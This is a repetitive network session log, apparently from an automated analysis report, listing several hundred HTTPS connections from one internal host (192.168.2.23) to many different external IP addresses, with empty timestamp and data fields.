                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12158192.168.2.2353804110.213.40.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12159192.168.2.2342166220.218.91.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12160192.168.2.235077462.87.40.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12161192.168.2.234114623.91.36.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12162192.168.2.234014494.77.68.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12163192.168.2.2352706152.37.110.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12164192.168.2.234544427.18.181.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12165192.168.2.235188642.5.148.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12166192.168.2.2346354206.210.106.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12167192.168.2.2344974124.49.92.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12168192.168.2.2334386110.19.114.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12169192.168.2.235576675.139.79.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12170192.168.2.2360374157.111.56.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12171192.168.2.235066461.19.227.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12172192.168.2.2349602155.17.236.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12173192.168.2.2352758219.62.173.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12174192.168.2.235806820.117.202.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12175192.168.2.233758291.109.36.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12176192.168.2.235902078.255.27.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12177192.168.2.2357386129.147.125.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12178192.168.2.2344826213.13.241.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12179192.168.2.2354664119.163.252.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12180192.168.2.2341500114.35.98.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12181192.168.2.2358960223.84.133.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12182192.168.2.2340506207.198.159.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12183192.168.2.2342696100.172.75.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12184192.168.2.2338334102.96.10.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12185192.168.2.2354664184.18.190.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12186192.168.2.233367072.220.32.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12187192.168.2.2334742112.2.83.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12188192.168.2.235642293.49.0.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12189192.168.2.235240894.77.62.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12190192.168.2.2352288138.126.196.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12191192.168.2.235994464.154.235.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192192.168.2.2334550176.115.178.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12193192.168.2.2342154147.128.238.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12194192.168.2.2353296173.95.27.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12195192.168.2.235693458.241.126.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12196192.168.2.234435492.242.187.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12197192.168.2.2347298193.105.155.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12198192.168.2.233738612.88.129.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12199192.168.2.235636877.255.207.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12200192.168.2.2354964176.25.147.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12201192.168.2.2343744107.95.42.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12202192.168.2.2336146166.188.79.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12203192.168.2.2334336122.6.220.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12204192.168.2.2342484209.41.191.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12205192.168.2.234074077.233.170.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12206192.168.2.23353729.61.154.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12207192.168.2.234939272.98.3.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12208192.168.2.233595698.190.16.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12209192.168.2.2358080211.108.196.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12210192.168.2.235027463.108.0.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12211192.168.2.2345578221.253.211.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12212192.168.2.234295444.211.205.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12213192.168.2.234811845.1.49.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12214192.168.2.234273883.231.83.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12215192.168.2.2341630104.142.70.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12216192.168.2.233795849.30.83.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12217192.168.2.2351922181.127.186.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12218192.168.2.233597863.132.131.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12219192.168.2.2345964137.21.233.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12220192.168.2.234904270.190.63.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12221192.168.2.2343922200.41.230.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12222192.168.2.234859261.17.49.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12223192.168.2.23551764.40.205.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12224192.168.2.2359578144.78.36.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12225192.168.2.2343080183.156.206.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12226192.168.2.2336688152.227.68.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12227192.168.2.235428445.147.219.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12228192.168.2.233751267.232.183.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12229192.168.2.2334928105.210.112.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12230192.168.2.235379091.138.93.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12231192.168.2.235864441.28.145.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12232192.168.2.235295413.3.190.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12233192.168.2.233512849.82.194.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12234192.168.2.233893439.106.86.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12235192.168.2.2338494142.56.225.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12236192.168.2.2346874122.122.203.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12237192.168.2.2340676183.15.52.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12238192.168.2.2349000106.212.18.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12239192.168.2.23429941.185.153.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12240192.168.2.2352500147.70.66.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12241192.168.2.234462812.218.133.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12242192.168.2.2334994134.23.60.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12243192.168.2.2355596206.213.137.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12244192.168.2.234462463.160.115.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12245192.168.2.2360632218.27.82.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12246192.168.2.235152631.193.117.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12247192.168.2.235239252.180.201.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12248192.168.2.2345854152.233.185.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12249192.168.2.2341904103.96.233.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12250192.168.2.2355862217.123.30.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12251192.168.2.2342898196.81.188.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12252192.168.2.235981071.9.98.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12253192.168.2.2341446212.164.57.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12254192.168.2.235676289.41.101.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12255192.168.2.2357634140.2.177.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12256192.168.2.234501441.204.148.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12257192.168.2.2345610163.221.230.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12258192.168.2.2359906114.254.98.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12259192.168.2.2342358117.214.253.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12260192.168.2.2341124176.128.73.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12261192.168.2.233545885.65.204.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12262192.168.2.235901842.14.138.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12263192.168.2.2344336159.104.98.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12264192.168.2.2357994175.185.207.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12265192.168.2.2357026192.122.49.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12266192.168.2.236051050.99.97.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12267192.168.2.2353606178.160.22.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12268192.168.2.233802876.183.9.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12269192.168.2.2346894113.153.176.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12270192.168.2.2333236203.64.147.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12271192.168.2.234504888.22.41.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12272192.168.2.2347808208.225.210.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12273192.168.2.2359874185.227.136.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12274192.168.2.2341422110.40.228.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12275192.168.2.2344850176.26.0.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12276192.168.2.2332806184.248.245.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12277192.168.2.236084899.218.173.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12278192.168.2.2357888113.166.101.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12279192.168.2.2349284115.64.82.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12280192.168.2.2350008200.168.26.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12281192.168.2.23499664.244.90.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12282192.168.2.23547601.114.122.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12283192.168.2.234001235.220.252.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12284192.168.2.233555836.30.120.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12285192.168.2.2340310107.175.226.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12286192.168.2.2338338102.174.217.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12287192.168.2.2336344178.120.60.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12288192.168.2.235662857.173.200.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12289192.168.2.2345232115.124.94.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12290192.168.2.2353566122.48.213.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12291192.168.2.234389662.144.187.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12292192.168.2.233502846.36.1.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12293192.168.2.235052694.234.125.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12294192.168.2.236045477.61.131.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12295192.168.2.2341182195.70.170.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12296192.168.2.2346462146.152.84.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12297192.168.2.2339160121.172.202.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12298192.168.2.2356602154.135.14.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12299192.168.2.234173696.174.36.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12300192.168.2.2352594220.93.220.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12301192.168.2.2339342147.35.27.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12302192.168.2.234410635.230.242.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12303192.168.2.2353058130.60.59.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12304192.168.2.2339104195.151.169.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12305192.168.2.2352168129.153.87.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12306192.168.2.2356996172.48.8.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12307192.168.2.2348562161.132.76.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12308192.168.2.2354194107.210.72.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12309192.168.2.2360968113.63.3.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12310192.168.2.2353826172.40.241.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12311192.168.2.234485474.96.212.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12312192.168.2.234764482.156.93.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12313192.168.2.2348976191.113.71.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12314192.168.2.2348030101.87.211.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12315192.168.2.236041013.232.188.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12316192.168.2.2342062171.137.191.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12317192.168.2.23593024.100.184.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12318192.168.2.235762671.75.253.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12319192.168.2.234854613.22.137.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12320192.168.2.2341854158.60.33.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12321192.168.2.234425820.59.1.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12322192.168.2.234235084.74.106.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12323192.168.2.2339582152.207.39.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12324192.168.2.235538265.203.143.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12325192.168.2.233671474.136.145.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12326192.168.2.233619849.89.39.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12327192.168.2.235778436.245.158.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12328192.168.2.2352718217.87.14.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12329192.168.2.233339499.234.224.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12330192.168.2.2351856221.138.163.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12331192.168.2.2350216112.242.144.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12332192.168.2.2351374219.138.250.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12333192.168.2.2333650144.94.10.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12334192.168.2.233551467.114.172.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12335192.168.2.2355512205.213.25.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12336192.168.2.233764253.45.7.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12337192.168.2.234126645.255.246.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12338192.168.2.234300070.28.67.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12339192.168.2.2351774155.29.205.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12340192.168.2.2345096169.10.221.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12341192.168.2.235748868.81.67.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12342192.168.2.236099695.178.228.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12343192.168.2.235271627.99.74.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12344192.168.2.2346758166.55.110.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12345192.168.2.2346584211.164.201.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12346192.168.2.235894267.108.208.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12347192.168.2.2335504125.90.32.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12348192.168.2.235664088.102.163.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12349192.168.2.23548085.73.247.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12350192.168.2.2337250156.209.47.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12351192.168.2.233612094.186.25.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12352192.168.2.2349432120.241.241.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12353192.168.2.2345872100.211.196.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12354192.168.2.234047242.14.199.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12355192.168.2.2352576184.127.150.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12356192.168.2.234897295.11.175.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12357192.168.2.233925217.149.111.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12358192.168.2.2339772185.36.110.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12359192.168.2.234596452.249.54.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12360192.168.2.2332966204.228.162.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12361192.168.2.234502480.234.88.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12362192.168.2.234552269.13.8.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12363192.168.2.2345472106.80.172.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12364192.168.2.234474454.219.217.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12365192.168.2.233286854.86.238.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12366192.168.2.2354946193.251.197.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12367192.168.2.235507442.16.87.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12368192.168.2.2341120166.152.28.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12369192.168.2.233802620.94.58.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12370192.168.2.2342754178.241.78.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12371192.168.2.235054895.126.225.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12372192.168.2.2352110147.182.120.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12373192.168.2.2340632120.93.123.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12374192.168.2.235864083.84.229.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12375192.168.2.2354660110.186.228.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12376192.168.2.2352806200.45.50.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12377192.168.2.2358598171.159.120.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12378192.168.2.2345684206.115.245.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12379192.168.2.2354198107.78.94.191443
                                                TimestampBytes transferredDirectionData


